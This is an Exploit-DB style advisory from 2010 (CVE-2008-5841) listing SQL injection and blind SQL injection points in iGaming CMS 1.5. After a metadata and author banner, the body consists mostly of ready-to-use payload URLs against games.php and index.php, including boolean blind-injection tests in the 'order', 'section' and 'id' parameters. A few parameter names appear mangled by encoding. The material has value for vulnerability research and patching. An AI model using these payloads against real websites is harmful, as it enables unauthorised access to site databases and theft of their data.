iGaming CMS - Multiple SQL Injections
Author: Sweet
type: webapps
platform: php
port:
date_added: 2010-08-27
date_updated: 2010-10-11
verified: 1
codes: OSVDB-51156;CVE-2008-5841
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comiGamingCMS1.5.zip
############################################################################
# #
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities #
# #
# Date: 27/08/2010 #
# #
# Author: Sweet #
# #
# Contact : charif38@hotmail.fr #
# #
# Software Link: http://www.igamingcms.com/ #
# #
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5 #
# #
# Version:1.5 #
# #
# Tested on: WinXp sp3 #
# #
# Risk : hight #
# #
# #
# Description : iGaming CMS is a content management #
# system designed for gaming websites. #
# #
# #
# #
############################################################################
1-SQL injection:
http://www.example.com/igamingpath/games.php?order=1[SQLi]§ion=111-222-1933email@address.tst&sort=desc
2-Blind injection:
http://www.example.com/igamingpath/games.php?order=title§ion=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc
http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0
thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com
Saha Ftourkoum et 1,2,3 viva L'Algerie :))